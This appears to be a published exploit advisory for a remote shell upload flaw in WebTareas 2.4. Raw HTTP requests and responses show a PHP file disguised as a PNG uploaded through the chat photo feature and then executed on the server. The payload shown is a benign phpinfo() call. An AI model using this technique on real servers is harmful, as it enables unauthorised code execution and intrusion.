Headline
WebTareas 2.4 Remote Shell Upload
WebTareas version 2.4 suffers from a remote shell upload vulnerability.
# Exploit Title: WebTareas 2.4 - RCE (Authorized)# Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: [email protected]# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example in forum -> members forum -> chat-----------------------------------------------------------------------------------------------------------------------Param: chatPhotos0-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /webtareas/includes/chattab_serv.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: */*Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------13392153614835728094189311126Content-Length: 6852Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=addCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="action"sendPhotos-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatTo"2-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatType"P-----------------------------13392153614835728094189311126Content-Disposition: form-data; name="chatPhotos0"; filename="snupi.php"Content-Type: image/pngPNG[...]<?php phpinfo();?>[...]-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 11:27:41 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 661Connection: closeContent-Type: application/json{"content":"<div class=\"message\"><div class=\"message-left\"><img class=\"avatar\" src=\"..\/includes\/avatars\/f2.png?ver=1665796223\"><\/div><div class=\"message-right\"><div class=\"message-info\"><div class=\"message-username\">Administrator<\/div><div class=\"message-timestamp\">2022-10-15 13:27<\/div><\/div><div class=\"photo-box\"><img src=\"..\/files\/Messages\/7.php\" onclick=\"javascript:showFullscreen(this);\"><div class=\"photo-action\"><a href=\"..\/files\/Messages\/7.php\" download=\"snupi.php\"><img title=\"Zaoszcz\u0119dzi\u0107\" src=\"..\/themes\/camping\/btn_download.png\"><\/a><\/div><label>snupi.php<\/label><\/div><\/div><\/div>"}-----------------------------------------------------------------------------------------------------------------------See link: /files\/Messages\/7.php-----------------------------------------------------------------------------------------------------------------------Req:-----------------------------------------------------------------------------------------------------------------------GET /webtareas/files/Messages/7.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: image/avif,image/webp,*/*Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeReferer: http://127.0.0.1/webtareas/topics/listtopics.php?forum=1&toggle_focus=members&msg=addCookie: webTareasSID=k177423c2af6isukkurfeq0g61; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1Sec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: same-origin-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 200 OKDate: Sat, 15 Oct 2022 11:28:16 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Connection: closeContent-Type: text/html; charset=UTF-8Content-Length: 89945[...]<title>PHP 7.4.30 - phpinfo()</title>[...]<h1 class="p">PHP Version 7.4.30</h1></td></tr></table><table><tr><td class="e">System </td><td class="v">Windows NT DESKTOP-LE3LSIM 10.0 build 19044 (Windows 10) AMD64 </td></tr><tr><td class="e">Build Date </td><td class="v">Jun 7 2022 16:22:15 </td></tr><tr><td class="e">Compiler </td><td class="v">Visual C++ 2017 [...]